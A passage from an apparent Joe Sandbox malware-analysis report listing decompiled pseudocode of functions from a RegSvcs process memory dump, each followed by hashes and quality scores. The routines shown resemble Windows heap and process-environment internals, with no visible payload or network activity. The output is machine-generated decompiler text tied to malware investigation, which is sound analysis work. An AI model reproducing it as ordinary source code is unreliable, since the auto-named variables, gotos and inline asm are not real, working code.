                                          						__eflags = _t28 - 0x13e7b0c;
                                          						if(_t28 != 0x13e7b0c) {
                                          							L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                          						}
                                          						_t9 = _t52 + 8; // 0x8
                                          						 *0x13e7b14 = _t50;
                                          						_t48 = _v12;
                                          						 *0x13e7b10 = _t9;
                                          						goto L6;
                                          					}
                                          					 *0x13e7b10 = _t37 + 8;
                                          					goto L6;
                                          				}
                                          				 *__ecx = _t17;
                                          				 *_t33 = 0;
                                          				goto L3;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fe1cd3decde2bd539ef2c10cded2e94be022fbc28df17b90d691c76615aaa45a
                                          • Instruction ID: 27e0c22ad3900bf1d0929e83add56466952dc4262d0566fdc7215fe5b5057274
                                          • Opcode Fuzzy Hash: fe1cd3decde2bd539ef2c10cded2e94be022fbc28df17b90d691c76615aaa45a
                                          • Instruction Fuzzy Hash: 6231AEB16003169FDB31DB5CE880F657BFDFB84718F14495AE2168B684D7709901CBD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 97%
                                          			E013261A0(signed int* __ecx) {
                                          				intOrPtr _v8;
                                          				char _v12;
                                          				intOrPtr* _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _t30;
                                          				intOrPtr _t31;
                                          				void* _t32;
                                          				intOrPtr _t33;
                                          				intOrPtr _t37;
                                          				intOrPtr _t49;
                                          				signed int _t51;
                                          				intOrPtr _t52;
                                          				signed int _t54;
                                          				void* _t59;
                                          				signed int* _t61;
                                          				intOrPtr* _t64;
                                          
                                          				_t61 = __ecx;
                                          				_v12 = 0;
                                          				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                          				_v16 = __ecx;
                                          				_v8 = 0;
                                          				if(_t30 == 0) {
                                          					L6:
                                          					_t31 = 0;
                                          					L7:
                                          					return _t31;
                                          				}
                                          				_t32 = _t30 + 0x5d8;
                                          				if(_t32 == 0) {
                                          					goto L6;
                                          				}
                                          				_t59 = _t32 + 0x30;
                                          				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                                          					goto L6;
                                          				}
                                          				if(__ecx != 0) {
                                          					 *((intOrPtr*)(__ecx)) = 0;
                                          					 *((intOrPtr*)(__ecx + 4)) = 0;
                                          				}
                                          				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                                          					_t51 =  *(_t32 + 0x10);
                                          					_t33 = _t32 + 0x10;
                                          					_v20 = _t33;
                                          					_t54 =  *(_t33 + 4);
                                          					if((_t51 | _t54) == 0) {
                                          						_t37 = E01325E50(0x12d67cc, 0, 0,  &_v12);
                                          						if(_t37 != 0) {
                                          							goto L6;
                                          						}
                                          						_t52 = _v8;
                                          						asm("lock cmpxchg8b [esi]");
                                          						_t64 = _v16;
                                          						_t49 = _t37;
                                          						_v20 = 0;
                                          						if(_t37 == 0) {
                                          							if(_t64 != 0) {
                                          								 *_t64 = _v12;
                                          								 *((intOrPtr*)(_t64 + 4)) = _t52;
                                          							}
                                          							E013C9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                                          							_t31 = 1;
                                          							goto L7;
                                          						}
                                          						E012FF7C0(_t52, _v12, _t52, 0);
                                          						if(_t64 != 0) {
                                          							 *_t64 = _t49;
                                          							 *((intOrPtr*)(_t64 + 4)) = _v20;
                                          						}
                                          						L12:
                                          						_t31 = 1;
                                          						goto L7;
                                          					}
                                          					if(_t61 != 0) {
                                          						 *_t61 = _t51;
                                          						_t61[1] = _t54;
                                          					}
                                          					goto L12;
                                          				} else {
                                          					goto L6;
                                          				}
                                          			}




















                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 31ec6520eca048b51d8bc135bf46fd69aeba5a381c4cbcc99ff114e73a4adf04
                                          • Instruction ID: 510fd29dfe544a9dd0905f04cb1a628b5eb8af6d0912278dc8e3fbeebe4dc9b5
                                          • Opcode Fuzzy Hash: 31ec6520eca048b51d8bc135bf46fd69aeba5a381c4cbcc99ff114e73a4adf04
                                          • Instruction Fuzzy Hash: 3E315AB16057118FE320DF1DC900B26BBE9EF88B18F55896DE9989B251E7B0E804CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 95%
                                          			E012FAA16(signed short* __ecx) {
                                          				signed int _v8;
                                          				intOrPtr _v12;
                                          				signed short _v16;
                                          				intOrPtr _v20;
                                          				signed short _v24;
                                          				signed short _v28;
                                          				void* _v32;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				intOrPtr _t25;
                                          				signed short _t38;
                                          				signed short* _t42;
                                          				signed int _t44;
                                          				signed short* _t52;
                                          				signed short _t53;
                                          				signed int _t54;
                                          
                                          				_v8 =  *0x13ed360 ^ _t54;
                                          				_t42 = __ecx;
                                          				_t44 =  *__ecx & 0x0000ffff;
                                          				_t52 =  &(__ecx[2]);
                                          				_t51 = _t44 + 2;
                                          				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
                                          					L4:
                                          					_t25 =  *0x13e7b9c; // 0x0
                                          					_t53 = L01314620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
                                          					__eflags = _t53;
                                          					if(_t53 == 0) {
                                          						L3:
                                          						return E0133B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
                                          					} else {
                                          						E0133F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
                                          						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
                                          						L2:
                                          						_t51 = 4;
                                          						if(L01306C59(_t53, _t51, _t58) != 0) {
                                          							_t28 = E01325E50(0x12dc338, 0, 0,  &_v32);
                                          							__eflags = _t28;
                                          							if(_t28 == 0) {
                                          								_t38 = ( *_t42 & 0x0000ffff) + 2;
                                          								__eflags = _t38;
                                          								_v24 = _t53;
                                          								_v16 = _t38;
                                          								_v20 = 0;
                                          								_v12 = 0;
                                          								E0132B230(_v32, _v28, 0x12dc2d8, 1,  &_v24);
                                          								_t28 = E012FF7A0(_v32, _v28);
                                          							}
                                          							__eflags = _t53 -  *_t52;
                                          							if(_t53 !=  *_t52) {
                                          								_t28 = L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                          							}
                                          						}
                                          						goto L3;
                                          					}
                                          				}
                                          				_t53 =  *_t52;
                                          				_t44 = _t44 >> 1;
                                          				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
                                          				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
                                          					goto L4;
                                          				}
                                          				goto L2;
                                          			}





















                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cfc731ad4f4e40630fde1bde4abb7502e9423cfdc142a691984983ac9bfddb2b
                                          • Instruction ID: 0a5aec3461a557695a1508f5498cb27135f577d152a1f053ed20ad078f3d8869
                                          • Opcode Fuzzy Hash: cfc731ad4f4e40630fde1bde4abb7502e9423cfdc142a691984983ac9bfddb2b
                                          • Instruction Fuzzy Hash: E631E5B1A1021AABCF15DF68CD41ABFB7B8EF44704F00446DF905E7254E7749955CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 93%
                                          			E01338EC7(void* __ecx, void* __edx) {
                                          				signed int _v8;
                                          				signed int* _v16;
                                          				intOrPtr _v20;
                                          				signed int* _v24;
                                          				char* _v28;
                                          				signed int* _v32;
                                          				intOrPtr _v36;
                                          				signed int* _v40;
                                          				signed int* _v44;
                                          				signed int* _v48;
                                          				intOrPtr _v52;
                                          				signed int* _v56;
                                          				signed int* _v60;
                                          				signed int* _v64;
                                          				intOrPtr _v68;
                                          				signed int* _v72;
                                          				char* _v76;
                                          				signed int* _v80;
                                          				signed int _v84;
                                          				signed int* _v88;
                                          				intOrPtr _v92;
                                          				signed int* _v96;
                                          				intOrPtr _v100;
                                          				signed int* _v104;
                                          				signed int* _v108;
                                          				char _v140;
                                          				signed int _v144;
                                          				signed int _v148;
                                          				signed int* _v152;
                                          				char _v156;
                                          				signed int* _v160;
                                          				char _v164;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t67;
                                          				intOrPtr _t70;
                                          				void* _t71;
                                          				void* _t72;
                                          				signed int _t73;
                                          
                                          				_t69 = __edx;
                                          				_v8 =  *0x13ed360 ^ _t73;
                                          				_t48 =  *[fs:0x30];
                                          				_t72 = __edx;
                                          				_t71 = __ecx;
                                          				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                                          					_t48 = E01324E70(0x13e86e4, 0x1339490, 0, 0);
                                          					if( *0x13e53e8 > 5 && E01338F33(0x13e53e8, 0, 0x2000) != 0) {
                                          						_v156 =  *((intOrPtr*)(_t71 + 0x44));
                                          						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
                                          						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
                                          						_v164 =  *((intOrPtr*)(_t72 + 0x58));
                                          						_v108 =  &_v84;
                                          						_v92 =  *((intOrPtr*)(_t71 + 0x28));
                                          						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
                                          						_v76 =  &_v156;
                                          						_t70 = 8;
                                          						_v60 =  &_v144;
                                          						_t67 = 4;
                                          						_v44 =  &_v148;
                                          						_v152 = 0;
                                          						_v160 = 0;
                                          						_v104 = 0;
                                          						_v100 = 2;
                                          						_v96 = 0;
                                          						_v88 = 0;
                                          						_v80 = 0;
                                          						_v72 = 0;
                                          						_v68 = _t70;
                                          						_v64 = 0;
                                          						_v56 = 0;
                                          						_v52 = 0x13e53e8;
                                          						_v48 = 0;
                                          						_v40 = 0;
                                          						_v36 = 0x13e53e8;
                                          						_v32 = 0;
                                          						_v28 =  &_v164;
                                          						_v24 = 0;
                                          						_v20 = _t70;
                                          						_v16 = 0;
                                          						_t69 = 0x12dbc46;
                                          						_t48 = E01377B9C(0x13e53e8, 0x12dbc46, _t67, 0x13e53e8, _t70,  &_v140);
                                          					}
                                          				}
                                          				return E0133B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
                                          			}












































                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5b0609381ea0c5739ee358953646a5a99cd6e8cf24ae6dfc3bb8a3de7341367d
                                          • Instruction ID: 2b98046af476364a37d1e0a42735d654371a1a42aac1fdac57975cca263d44ef
                                          • Opcode Fuzzy Hash: 5b0609381ea0c5739ee358953646a5a99cd6e8cf24ae6dfc3bb8a3de7341367d
                                          • Instruction Fuzzy Hash: E04182B5D0031C9EDB20CFAAD981AADFBF8FB48714F5041AEE509A7640D7745A44CF54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 74%
                                          			E0132E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                                          				intOrPtr* _v0;
                                          				signed char _v4;
                                          				signed int _v8;
                                          				void* __ecx;
                                          				void* __ebp;
                                          				void* _t37;
                                          				intOrPtr _t38;
                                          				signed int _t44;
                                          				signed char _t52;
                                          				void* _t54;
                                          				intOrPtr* _t56;
                                          				void* _t58;
                                          				char* _t59;
                                          				signed int _t62;
                                          
                                          				_t58 = __edx;
                                          				_push(0);
                                          				_push(4);
                                          				_push( &_v8);
                                          				_push(0x24);
                                          				_push(0xffffffff);
                                          				if(E01339670() < 0) {
                                          					E0134DF30(_t54, _t58, _t35);
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					_push(_t54);
                                          					_t52 = _v4;
                                          					if(_t52 > 8) {
                                          						_t37 = 0xc0000078;
                                          					} else {
                                          						_t38 =  *0x13e7b9c; // 0x0
                                          						_t62 = _t52 & 0x000000ff;
                                          						_t59 = L01314620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                                          						if(_t59 == 0) {
                                          							_t37 = 0xc0000017;
                                          						} else {
                                          							_t56 = _v0;
                                          							 *(_t59 + 1) = _t52;
                                          							 *_t59 = 1;
                                          							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                                          							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                                          							_t44 = _t62 - 1;
                                          							if(_t44 <= 7) {
                                          								switch( *((intOrPtr*)(_t44 * 4 +  &M0132E810))) {
                                          									case 0:
                                          										L6:
                                          										 *((intOrPtr*)(_t59 + 8)) = _a8;
                                          										goto L7;
                                          									case 1:
                                          										L13:
                                          										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                                          										goto L6;
                                          									case 2:
                                          										L12:
                                          										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                                          										goto L13;
                                          									case 3:
                                          										L11:
                                          										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                                          										goto L12;
                                          									case 4:
                                          										L10:
                                          										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                                          										goto L11;
                                          									case 5:
                                          										L9:
                                          										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                                          										goto L10;
                                          									case 6:
                                          										L17:
                                          										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                                          										goto L9;
                                          									case 7:
                                          										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                                          										goto L17;
                                          								}
                                          							}
                                          							L7:
                                          							 *_a40 = _t59;
                                          							_t37 = 0;
                                          						}
                                          					}
                                          					return _t37;
                                          				} else {
                                          					_push(0x20);
                                          					asm("ror eax, cl");
                                          					return _a4 ^ _v8;
                                          				}
                                          			}


















                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a85c24bf523f3a8d56a346c0921b91da560e14ce5c9ea003611b902ecc7a72e5
                                          • Instruction ID: ebcec851f07696dfdf0bd0530e369cd2378f228a6383b53eb585f15fbaa9bf91
                                          • Opcode Fuzzy Hash: a85c24bf523f3a8d56a346c0921b91da560e14ce5c9ea003611b902ecc7a72e5
                                          • Instruction Fuzzy Hash: BA318C75A14249EFD704DF5CC841B9ABBE8FB08328F14826AFA04CB341D671EC80CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 67%
                                          			E0132BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				void* __ebx;
                                          				void* __edi;
                                          				intOrPtr _t22;
                                          				intOrPtr* _t41;
                                          				intOrPtr _t51;
                                          
                                          				_t51 =  *0x13e6100; // 0x5
                                          				_v12 = __edx;
                                          				_v8 = __ecx;
                                          				if(_t51 >= 0x800) {
                                          					L12:
                                          					return 0;
                                          				} else {
                                          					goto L1;
                                          				}
                                          				while(1) {
                                          					L1:
                                          					_t22 = _t51;
                                          					asm("lock cmpxchg [ecx], edx");
                                          					if(_t51 == _t22) {
                                          						break;
                                          					}
                                          					_t51 = _t22;
                                          					if(_t22 < 0x800) {
                                          						continue;
                                          					}
                                          					goto L12;
                                          				}
                                          				E01312280(0xd, 0x637f1a0);
                                          				_t41 =  *0x13e60f8; // 0x0
                                          				if(_t41 != 0) {
                                          					 *0x13e60f8 =  *_t41;
                                          					 *0x13e60fc =  *0x13e60fc + 0xffff;
                                          				}
                                          				E0130FFB0(_t41, 0x800, 0x637f1a0);
                                          				if(_t41 != 0) {
                                          					L6:
                                          					asm("movsd");
                                          					asm("movsd");
                                          					asm("movsd");
                                          					asm("movsd");
                                          					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                                          					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                                          					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                                          					do {
                                          						asm("lock xadd [0x13e60f0], ax");
                                          						 *((short*)(_t41 + 0x34)) = 1;
                                          					} while (1 == 0);
                                          					goto L8;
                                          				} else {
                                          					_t41 = L01314620(0x13e6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                                          					if(_t41 == 0) {
                                          						L11:
                                          						asm("lock dec dword [0x13e6100]");
                                          						L8:
                                          						return _t41;
                                          					}
                                          					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                                          					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                                          					if(_t41 == 0) {
                                          						goto L11;
                                          					}
                                          					goto L6;
                                          				}
                                          			}











                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1f129929d5f4a3b5c814d111103644fddf9671524c03ed8a565300e451964bb8
                                          • Instruction ID: c5dcc7f51e43ca05941195938809e7a494b8923886b51ffac6bee7cdaf21ba35
                                          • Opcode Fuzzy Hash: 1f129929d5f4a3b5c814d111103644fddf9671524c03ed8a565300e451964bb8
                                          • Instruction Fuzzy Hash: E731E3B66007259BCB62EF58D4817A6B7BCFB28318F044479DD44EF24AEB74DD058B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 76%
                                          			E012F9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                                          				signed int _t53;
                                          				signed int _t56;
                                          				signed int* _t60;
                                          				signed int _t63;
                                          				signed int _t66;
                                          				signed int _t69;
                                          				void* _t70;
                                          				intOrPtr* _t72;
                                          				void* _t78;
                                          				void* _t79;
                                          				signed int _t80;
                                          				intOrPtr _t82;
                                          				void* _t85;
                                          				void* _t88;
                                          				void* _t89;
                                          
                                          				_t84 = __esi;
                                          				_t70 = __ecx;
                                          				_t68 = __ebx;
                                          				_push(0x2c);
                                          				_push(0x13cf6e8);
                                          				E0134D0E8(__ebx, __edi, __esi);
                                          				 *((char*)(_t85 - 0x1d)) = 0;
                                          				_t82 =  *((intOrPtr*)(_t85 + 8));
                                          				if(_t82 == 0) {
                                          					L4:
                                          					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                                          						E013C88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                                          					}
                                          					L5:
                                          					return E0134D130(_t68, _t82, _t84);
                                          				}
                                          				_t88 = _t82 -  *0x13e86c0; // 0xe907b0
                                          				if(_t88 == 0) {
                                          					goto L4;
                                          				}
                                          				_t89 = _t82 -  *0x13e86b8; // 0x0
                                          				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                          					goto L4;
                                          				} else {
                                          					E01312280(_t82 + 0xe0, _t82 + 0xe0);
                                          					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                                          					__eflags =  *((char*)(_t82 + 0xe5));
                                          					if(__eflags != 0) {
                                          						E013C88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                                          						goto L12;
                                          					} else {
                                          						__eflags =  *((char*)(_t82 + 0xe4));
                                          						if( *((char*)(_t82 + 0xe4)) == 0) {
                                          							 *((char*)(_t82 + 0xe4)) = 1;
                                          							_push(_t82);
                                          							_push( *((intOrPtr*)(_t82 + 0x24)));
                                          							E0133AFD0();
                                          						}
                                          						while(1) {
                                          							_t60 = _t82 + 8;
                                          							 *(_t85 - 0x2c) = _t60;
                                          							_t68 =  *_t60;
                                          							_t80 = _t60[1];
                                          							 *(_t85 - 0x28) = _t68;
                                          							 *(_t85 - 0x24) = _t80;
                                          							while(1) {
                                          								L10:
                                          								__eflags = _t80;
                                          								if(_t80 == 0) {
                                          									break;
                                          								}
                                          								_t84 = _t68;
                                          								 *(_t85 - 0x30) = _t80;
                                          								 *(_t85 - 0x24) = _t80 - 1;
                                          								asm("lock cmpxchg8b [edi]");
                                          								_t68 = _t84;
                                          								 *(_t85 - 0x28) = _t68;
                                          								 *(_t85 - 0x24) = _t80;
                                          								__eflags = _t68 - _t84;
                                          								_t82 =  *((intOrPtr*)(_t85 + 8));
                                          								if(_t68 != _t84) {
                                          									continue;
                                          								}
                                          								__eflags = _t80 -  *(_t85 - 0x30);
                                          								if(_t80 !=  *(_t85 - 0x30)) {
                                          									continue;
                                          								}
                                          								__eflags = _t80;
                                          								if(_t80 == 0) {
                                          									break;
                                          								}
                                          								_t63 = 0;
                                          								 *(_t85 - 0x34) = 0;
                                          								_t84 = 0;
                                          								__eflags = 0;
                                          								while(1) {
                                          									 *(_t85 - 0x3c) = _t84;
                                          									__eflags = _t84 - 3;
                                          									if(_t84 >= 3) {
                                          										break;
                                          									}
                                          									__eflags = _t63;
                                          									if(_t63 != 0) {
                                          										L40:
                                          										_t84 =  *_t63;
                                          										__eflags = _t84;
                                          										if(_t84 != 0) {
                                          											_t84 =  *(_t84 + 4);
                                          											__eflags = _t84;
                                          											if(_t84 != 0) {
                                          												 *0x13eb1e0(_t63, _t82);
                                          												 *_t84();
                                          											}
                                          										}
                                          										do {
                                          											_t60 = _t82 + 8;
                                          											 *(_t85 - 0x2c) = _t60;
                                          											_t68 =  *_t60;
                                          											_t80 = _t60[1];
                                          											 *(_t85 - 0x28) = _t68;
                                          											 *(_t85 - 0x24) = _t80;
                                          											goto L10;
                                          										} while (_t63 == 0);
                                          										goto L40;
                                          									}
                                          									_t69 = 0;
                                          									__eflags = 0;
                                          									while(1) {
                                          										 *(_t85 - 0x38) = _t69;
                                          										__eflags = _t69 -  *0x13e84c0;
                                          										if(_t69 >=  *0x13e84c0) {
                                          											break;
                                          										}
                                          										__eflags = _t63;
                                          										if(_t63 != 0) {
                                          											break;
                                          										}
                                          										_t66 = E013C9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                                          										__eflags = _t66;
                                          										if(_t66 == 0) {
                                          											_t63 = 0;
                                          											__eflags = 0;
                                          										} else {
                                          											_t63 = _t66 + 0xfffffff4;
                                          										}
                                          										 *(_t85 - 0x34) = _t63;
                                          										_t69 = _t69 + 1;
                                          									}
                                          									_t84 = _t84 + 1;
                                          								}
                                          								__eflags = _t63;
                                          							}
                                          							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                                          							 *((char*)(_t82 + 0xe5)) = 1;
                                          							 *((char*)(_t85 - 0x1d)) = 1;
                                          							L12:
                                          							 *(_t85 - 4) = 0xfffffffe;
                                          							E012F922A(_t82);
                                          							_t53 = E01317D50();
                                          							__eflags = _t53;
                                          							if(_t53 != 0) {
                                          								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                          							} else {
                                          								_t56 = 0x7ffe0386;
                                          							}
                                          							__eflags =  *_t56;
                                          							if( *_t56 != 0) {
                                          								_t56 = E013C8B58(_t82);
                                          							}
                                          							__eflags =  *((char*)(_t85 - 0x1d));
                                          							if( *((char*)(_t85 - 0x1d)) != 0) {
                                          								__eflags = _t82 -  *0x13e86c0; // 0xe907b0
                                          								if(__eflags != 0) {
                                          									__eflags = _t82 -  *0x13e86b8; // 0x0
                                          									if(__eflags == 0) {
                                          										_t79 = 0x13e86bc;
                                          										_t72 = 0x13e86b8;
                                          										goto L18;
                                          									}
                                          									__eflags = _t56 | 0xffffffff;
                                          									asm("lock xadd [edi], eax");
                                          									if(__eflags == 0) {
                                          										E012F9240(_t68, _t82, _t82, _t84, __eflags);
                                          									}
                                          								} else {
                                          									_t79 = 0x13e86c4;
                                          									_t72 = 0x13e86c0;
                                          									L18:
                                          									E01329B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                                          								}
                                          							}
                                          							goto L5;
                                          						}
                                          					}
                                          				}
                                          			}



















                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e59d3e4136ebaa48a703a078245fcc1e55d365907fb6590be5001b3c554779bb
                                          • Instruction ID: 6807857e792b9e3d388b3317ec746c7c48f5140b7eebd99dd925dab2ba20aca5
                                          • Opcode Fuzzy Hash: e59d3e4136ebaa48a703a078245fcc1e55d365907fb6590be5001b3c554779bb
                                          • Instruction Fuzzy Hash: 5A319075A112469FEF25DB6CC448BAEFBF1BB4935CF1481ADE70467281C370A980CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 60%
                                          			E01321DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                          				char _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr* _v20;
                                          				void* _t22;
                                          				char _t23;
                                          				void* _t36;
                                          				intOrPtr _t42;
                                          				intOrPtr _t43;
                                          
                                          				_v12 = __ecx;
                                          				_t43 = 0;
                                          				_v20 = __edx;
                                          				_t42 =  *__edx;
                                          				 *__edx = 0;
                                          				_v16 = _t42;
                                          				_push( &_v8);
                                          				_push(0);
                                          				_push(0);
                                          				_push(6);
                                          				_push(0);
                                          				_push(__ecx);
                                          				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
                                          				_push(_t36);
                                          				_t22 = E0131F460();
                                          				if(_t22 < 0) {
                                          					if(_t22 == 0xc0000023) {
                                          						goto L1;
                                          					}
                                          					L3:
                                          					return _t43;
                                          				}
                                          				L1:
                                          				_t23 = _v8;
                                          				if(_t23 != 0) {
                                          					_t38 = _a4;
                                          					if(_t23 >  *_a4) {
                                          						_t42 = L01314620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
                                          						if(_t42 == 0) {
                                          							goto L3;
                                          						}
                                          						_t23 = _v8;
                                          					}
                                          					_push( &_v8);
                                          					_push(_t23);
                                          					_push(_t42);
                                          					_push(6);
                                          					_push(_t43);
                                          					_push(_v12);
                                          					_push(_t36);
                                          					if(E0131F460() < 0) {
                                          						if(_t42 != 0 && _t42 != _v16) {
                                          							L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
                                          						}
                                          						goto L3;
                                          					}
                                          					 *_v20 = _t42;
                                          					 *_a4 = _v8;
                                          				}
                                          				_t43 = 1;
                                          				goto L3;
                                          			}













                                          Memory Dump Source
